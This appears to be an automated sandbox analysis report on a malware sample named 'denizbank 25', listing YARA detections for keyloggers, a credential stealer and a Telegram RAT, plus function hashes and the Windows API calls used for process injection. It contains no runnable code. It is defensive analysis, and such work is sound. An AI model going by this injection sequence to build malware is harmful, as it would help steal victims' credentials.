Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	9.5%
Total number of Nodes:	169
Total number of Limit Nodes:	13

Executed Functions

Function 0723F8EA Relevance: .7, Instructions: 714COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe7d5413457998518667f3605360600259e1cfc6643b649c8edc924972b3e865
Instruction ID: fc2944d39455e2d9a0e0373403bf71c383bb4e2ade83adc0c0d4f7903f194179
Opcode Fuzzy Hash: fe7d5413457998518667f3605360600259e1cfc6643b649c8edc924972b3e865
Instruction Fuzzy Hash: 8DC1BBF1B106028FDB19DB75D610B6EB7F6AFC8700F14886ED15A9B2A0DB35E801CB52

Function 072361EE Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bada12e2b0313cd32155248ab78e3dba493f4d088ce5c6cd4071f7289853db80
Instruction ID: deef1c1e04b17a7fbab89df4da5c90555dd1932b4acd1c2fc8a79cb346bb5af5
Opcode Fuzzy Hash: bada12e2b0313cd32155248ab78e3dba493f4d088ce5c6cd4071f7289853db80
Instruction Fuzzy Hash: A981D4B4925218DFCB14CFA5D984BECBBBAFF4A301F5091A9D409AB351DB709A81CF50

Function 0723D8F0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773e92667cd0fdc634e655b910285b1dba5044f2bf96779def818da2cdbc752c
Instruction ID: 947e7cfcfa99557ff7b26e61c1e7dff3f652481b052e8dc57050f9d1f694d697
Opcode Fuzzy Hash: 773e92667cd0fdc634e655b910285b1dba5044f2bf96779def818da2cdbc752c
Instruction Fuzzy Hash: F9611CB1E64619CBDB64CF66C8407EDB7B6BF89300F14D1AAD40DA7254EB705A85CF40

Function 0723E087 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd037c1f786858a19792f617df13291f387b2cb77af61beeb7ec077e96e94050
Instruction ID: b740a4534bed56a24ea0536172c100ffbac67b1b7b2045cb6391ccf403ac29f3
Opcode Fuzzy Hash: cd037c1f786858a19792f617df13291f387b2cb77af61beeb7ec077e96e94050
Instruction Fuzzy Hash: E5D0E2B4939104CBC710CF20E4055B8B6B8AB0B300F0160A2980AA3321D63199418E00

Function 00E7D418 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E7D496
GetCurrentThread.KERNEL32 ref: 00E7D4D3
GetCurrentProcess.KERNEL32 ref: 00E7D510
GetCurrentThreadId.KERNEL32 ref: 00E7D569

Memory Dump Source

Source File: 00000000.00000002.1798937817.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_denizbank 25.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8b8f23e05ae38aba9b3f33c8659e6ec3de751febade11f0ad98147d48ff782c7
Instruction ID: a8d8fc525b4ac9e4613792aefc91b9b76e554e41d878c4c00bcfbece82e65202
Opcode Fuzzy Hash: 8b8f23e05ae38aba9b3f33c8659e6ec3de751febade11f0ad98147d48ff782c7
Instruction Fuzzy Hash: 535135B4900209CFDB14DFA9D948B9EBBF1EF88318F20C459D419A73A0D774A984CF65

Function 0723BD70 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0723BFA6

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: de1221a0f4a29890ba379451c4712349fb18b26924da867062089f2b7617c7df
Instruction ID: 33938b97807942503e7fe1add217c9d24f994c2b6afde9942c040e69981bad72
Opcode Fuzzy Hash: de1221a0f4a29890ba379451c4712349fb18b26924da867062089f2b7617c7df
Instruction Fuzzy Hash: F7915BF1D1025ADFDB10DFA8C9417EEBBB6EF48310F1481A9E808A7294DB749985CF91

Function 0723BD6E Relevance: 1.7, APIs: 1, Instructions: 242
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0723BFA6

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4a1a3f1c9ba691241f6c72a795ca31e4519e44508e4d73ca12a0492ebb67711c
Instruction ID: 11756ff39b251ce722a369262793d3398539f646c1b01cd9c2e1d71ab0011acb
Opcode Fuzzy Hash: 4a1a3f1c9ba691241f6c72a795ca31e4519e44508e4d73ca12a0492ebb67711c
Instruction Fuzzy Hash: 97915BF1D1025ACFDB10CFA8C9417EEBBB6EF48310F1481A9E808A7294DB749985CF91

Function 00E7AD88 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00E7AFDE

Memory Dump Source

Source File: 00000000.00000002.1798937817.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_denizbank 25.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 47a4e2b5906a789f7c00c1872386a29c5653a58acb9cca826e4ed2f824446df1
Instruction ID: 91596a26ba250b93aaaee3612744e280071fef3b8f11380eb4518c23b364468d
Opcode Fuzzy Hash: 47a4e2b5906a789f7c00c1872386a29c5653a58acb9cca826e4ed2f824446df1
Instruction Fuzzy Hash: 75712570A00B058FDB24DF29D44575ABBF1FF88308F04892EE48AE7A50D774E949CB91

Function 00E744B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E759C9

Memory Dump Source

Source File: 00000000.00000002.1798937817.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_denizbank 25.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 266b621dd38f9f30a2be25b4da205f4863db1a08bc377446f84b13aca83857f5
Instruction ID: 24ea506c9ef876bd48fe430af73425ae58a2b0816ded4ad6ad28111f1af925b3
Opcode Fuzzy Hash: 266b621dd38f9f30a2be25b4da205f4863db1a08bc377446f84b13aca83857f5
Instruction Fuzzy Hash: 7941F1B1C00719CBDB24CFA9C884BCDBBB5BF48308F24806AD409BB255DBB56946CF90

Function 00E75917 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E759C9

Memory Dump Source

Source File: 00000000.00000002.1798937817.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_denizbank 25.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ad21ccb91a0680ea2432b3e35ff565601d42718c79af5fcdcb5281dd870289bd
Instruction ID: dff874c593ec0d465dfce3a66218947a5c5051e78901c5276a226968f316ae93
Opcode Fuzzy Hash: ad21ccb91a0680ea2432b3e35ff565601d42718c79af5fcdcb5281dd870289bd
Instruction Fuzzy Hash: 5641DFB1C00719CBDB24CFA9C884ACDBBB5BF48708F24856AD409BB255DBB56946CF90

Function 0723BAE0 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0723BB78

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d4860a0d3f256caee16a84f6c1b62bd18ad4b68b9b68c7ef4a28b94ae06cb7de
Instruction ID: bdeda1f656bca2cbbb588c760308c30bf73bdcd471559e906bf7460e1529f6a4
Opcode Fuzzy Hash: d4860a0d3f256caee16a84f6c1b62bd18ad4b68b9b68c7ef4a28b94ae06cb7de
Instruction Fuzzy Hash: F32146B69003599FCB10CFA9C881BDEBBF5FF48320F10842AE958A7250C7789544CBA5

Function 0723BAE8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0723BB78

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c3cd1a3705cbafcd80ebe56e4192b87e008abec0247ae1e20e1d378b945b676a
Instruction ID: c16c7a38977d01af4c46246bf9aaca300d580ce31c72eea98b2f390337e4d1fa
Opcode Fuzzy Hash: c3cd1a3705cbafcd80ebe56e4192b87e008abec0247ae1e20e1d378b945b676a
Instruction Fuzzy Hash: 232125B1900359DFCB10DFA9C985BDEBBF5FF48320F10842AE959A7250C778A944CBA5

Function 0723B949 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0723B9CE

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8cd55e5e114e633de6c9a95a1b3a794c5f2e0eb46357a1ca77a6fcafbe287dc8
Instruction ID: 86107d90b2a7fc315d673ed123eea39f87e50c131477ab5baaaa1d8f32b7d04c
Opcode Fuzzy Hash: 8cd55e5e114e633de6c9a95a1b3a794c5f2e0eb46357a1ca77a6fcafbe287dc8
Instruction Fuzzy Hash: 37213AB1910309CFDB10DFAAC5857EEBBF4EF88324F10842AD459A7240C778A945CFA5

Function 0723BBD0 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0723BC58

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d8db78c73b6a234b53cebc51fe1bd7018d5cf325244cfe52e2bebe5adea0acf0
Instruction ID: fc4513a38f3342f45abf516339149f6ff9967ee52f777e90832e39113163cc83
Opcode Fuzzy Hash: d8db78c73b6a234b53cebc51fe1bd7018d5cf325244cfe52e2bebe5adea0acf0
Instruction Fuzzy Hash: 74212AB5900359DFDB10DFAAC981AEEBBF5FF48320F14882AE558A7250C7349545CFA4

Function 0723BBD8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0723BC58

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5842532817d877851737d1887597f405708a253f1841a1f431aa1cc67a809791
Instruction ID: fb2c0e3da068a6067c72fee6d73acfa35b741b5468b96f179f7a5eb50feb50d7
Opcode Fuzzy Hash: 5842532817d877851737d1887597f405708a253f1841a1f431aa1cc67a809791
Instruction Fuzzy Hash: 502128B18003599FCB10DFAAC981ADEBBF5FF48320F10882AE558A7250C7389544CBA4

Function 0723B950 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0723B9CE

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 81d253785f48c570d47577ccfa781b33bdd3e4d96d63028150556f24eeccccdd
Instruction ID: 4cf5bdf331ea42843d41311d1faf2ca3b3c040e6389d1f0b9e413b5587cc543b
Opcode Fuzzy Hash: 81d253785f48c570d47577ccfa781b33bdd3e4d96d63028150556f24eeccccdd
Instruction Fuzzy Hash: F12149B19103098FDB10DFAAC4857EEBBF4EF88324F10842AD459A7240C778A944CFA5

Function 00E7D660 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7D6E7

Memory Dump Source

Source File: 00000000.00000002.1798937817.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_denizbank 25.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1d8012d9a77e67931408b8b7d5e9e05ea5c58eba79fad7a93148de766a623db5
Instruction ID: cfc6e9d96746de7387cfd399cceb97b4589d4260c614e2380806d837261dad8b
Opcode Fuzzy Hash: 1d8012d9a77e67931408b8b7d5e9e05ea5c58eba79fad7a93148de766a623db5
Instruction Fuzzy Hash: 4A21B3B59002599FDB10CF9AD984ADEBBF8EB48310F14841AE958A7350D374A944CFA5

Function 0723BA21 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0723BA96

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9e4bce3ebc7a69ff5e1387f83122e384faef3d7e25f26300113a6a67be37eff
Instruction ID: dc7f478915d87eb81fbedde9754ce1e4e11b5e65c86f5c55d289be6d52121c6f
Opcode Fuzzy Hash: a9e4bce3ebc7a69ff5e1387f83122e384faef3d7e25f26300113a6a67be37eff
Instruction Fuzzy Hash: 0B2167B6900249DFDB10DFA9D9447DEBFF5EF88320F24881AE555A7210C7359544CFA0

Function 0723BA28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0723BA96

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ca56fb52c9af206a79e7403e9e2048b3c19278a658dd97092efca304b0562804
Instruction ID: ef98a00b7fd4f02614e964d3c73034c48fb301721dcc51699acd914ec1d4cd9a
Opcode Fuzzy Hash: ca56fb52c9af206a79e7403e9e2048b3c19278a658dd97092efca304b0562804
Instruction Fuzzy Hash: A21126B19002499FDB10DFAAC844ADEBFF5EB48320F108819E555A7250C775A544CFA0

Function 0723B899 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0723B902

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9e60307fe2fe9dfd04ed1c9fd9d59f5010b1cb21f7fa00be0cc0f27cc5575812
Instruction ID: 2619e0d7d601ac8a594dd8ba3fb95f465c4bbf7b3b58e6e3452537ee5c33d2a1
Opcode Fuzzy Hash: 9e60307fe2fe9dfd04ed1c9fd9d59f5010b1cb21f7fa00be0cc0f27cc5575812
Instruction Fuzzy Hash: 7B1149B59043498FDB20DFAAD4457EEFFF4AB88320F20881AD455A7650C635A544CFA5

Function 0723B8A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0723B902

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8d744157fc8c868446a2e593adaf8beaf450255873e52efdc8eacb6c88eb8d3a
Instruction ID: 3df65eca6dccfc2b47ef353d819424590a6ca9aa0691f7c939a8e02d19de3393
Opcode Fuzzy Hash: 8d744157fc8c868446a2e593adaf8beaf450255873e52efdc8eacb6c88eb8d3a
Instruction Fuzzy Hash: B7113AB1900359CFDB10DFAAC4457DEFBF4EB88324F208419D559A7250C779A544CFA4

Function 00E7AF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00E7AFDE

Memory Dump Source

Source File: 00000000.00000002.1798937817.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_denizbank 25.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9aedd2728fe69914a7601a182b935c26c0ff498a45a7299321d3a32e7f3f8f19
Instruction ID: d92557e3fa0ad241d009ef6f69304df21fc1a6e7b55e7f5a77ca64b7326b4147
Opcode Fuzzy Hash: 9aedd2728fe69914a7601a182b935c26c0ff498a45a7299321d3a32e7f3f8f19
Instruction Fuzzy Hash: 2911E0B5D003498FDB14DF9AC444ADEFBF4AB88324F14C42AD869B7610C379A545CFA5

Function 07238720 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0723EBD5

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d451b768e8831dbbfb9eca6bb874c4d5ff177640610d61bf73cfc5d4a7dc2343
Instruction ID: ca7bc36e9557e9bb9addeff856eac3fc067a0628fb2ce37a89f9f835c651b8b9
Opcode Fuzzy Hash: d451b768e8831dbbfb9eca6bb874c4d5ff177640610d61bf73cfc5d4a7dc2343
Instruction Fuzzy Hash: 8E1122B5800359DFDB10DF9AC484BDEBBF8FB48324F10841AE959A7200C375A944CFA1

Function 0723EB70 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0723EBD5

Memory Dump Source

Source File: 00000000.00000002.1802915337.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_denizbank 25.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 31fb333cdd340ca98875e4d8b0e657ea14eb1efa3f93fd60d0cd943d3d34edf6
Instruction ID: 6b12ae3880375ce5a105e477464b8d7ec56fe1557cc7eb41c07e0475636d79ae
Opcode Fuzzy Hash: 31fb333cdd340ca98875e4d8b0e657ea14eb1efa3f93fd60d0cd943d3d34edf6
Instruction Fuzzy Hash: E91113B58003599FCB10DF9AD484BDEBBF8FB48320F10851AE515A7650C375A584CFA1

Function 0AA70040 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1804557828.000000000AA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa70000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea197871098e560bf47f3a3eecfe77bea7af85dba7099a0628787d9febf191d
Instruction ID: 637833cc1304bfe67d6db387435453d2d31a1e958e768bcb0250cd6d96b9a75c
Opcode Fuzzy Hash: 2ea197871098e560bf47f3a3eecfe77bea7af85dba7099a0628787d9febf191d
Instruction Fuzzy Hash: A2A15C75B012049FDB14DB68DA94BAEB7F6EF88300F2540A9E505EB3A1CB71ED05CB91

Function 00A5D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797713219.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a5d000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f35f9f8a84db86ce9f84e364d6168a70c97dd3575658ad54e214664ea0035fc
Instruction ID: 42c8c19858d1a8cc5c3c72c7a70d21c9d53841c7ca56cb70f137093431caeaa3
Opcode Fuzzy Hash: 9f35f9f8a84db86ce9f84e364d6168a70c97dd3575658ad54e214664ea0035fc
Instruction Fuzzy Hash: 9E2125B1500204EFDB25DF14D9C0B26BF75FB98325F20C569ED094F256C33AE85ACAA2

Function 00A6D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797787717.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6d000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6832c21315f2581f70b9947a4b7891429436fd49390407275ee518e66714e1e
Instruction ID: 883f2e1328499ca36575087570fa39794244a27ea6403a1c79b4ea811746fcaa
Opcode Fuzzy Hash: b6832c21315f2581f70b9947a4b7891429436fd49390407275ee518e66714e1e
Instruction Fuzzy Hash: 382126B1A04200EFDB05DF24D9D0B66BBB5FB88354F24C66DE9094F296C336D846CA61

Function 00A6D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797787717.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6d000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bf5fbae47b8c2c574ce153e783809318c38f27d2702f4ff5cc9aae31da6cf6
Instruction ID: 7b83a64d2e8bde2bc7a9cdd021f894bdc47c320910c24c16c20f2f42e76aaa9c
Opcode Fuzzy Hash: 29bf5fbae47b8c2c574ce153e783809318c38f27d2702f4ff5cc9aae31da6cf6
Instruction Fuzzy Hash: D521FF75A04240EFCB14DF24D984B26BFB5FB88354F24C569E80A4B296C33BD847CAA1

Function 00A5D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797713219.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a5d000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: bfe54f2c8eaaff998692f10a5dc1f85e155bdeb1fb5bf2ace57b02cd894ddb66
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 9A110372404240DFDB16CF00D5C4B16BF72FB94324F24C2A9DC090B256C33AE85ACBA1

Function 00A6D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797787717.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6d000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: f1207bd946ca82f01e8fec816543dec262a8304aff231f08e99448f49b38fd32
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: E7118E75A04280DFDB15CF14D5C4B15BB71FB84318F24C6AAD84A4B656C33AD84ACB61

Function 00A6D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797787717.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a6d000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: b5184c467fc16da2c4322ffd550e6cd41172e73f37e1193264fdd00bc09ae915
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 5C11BB75A04280DFCB12CF20C5D4B55BBB1FB84314F28C6AAD8494B296C33AD84ACB61

Function 00A5D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1797713219.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a5d000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f3b2bc6d4eae6d6c671bb7332ba9246d09c8a38a1cafa21c29e1fecdd866a81
Instruction ID: 5a76da971f839577056bce8cce3b7df8f29b165ca9ffbeb531fbfd9515183251
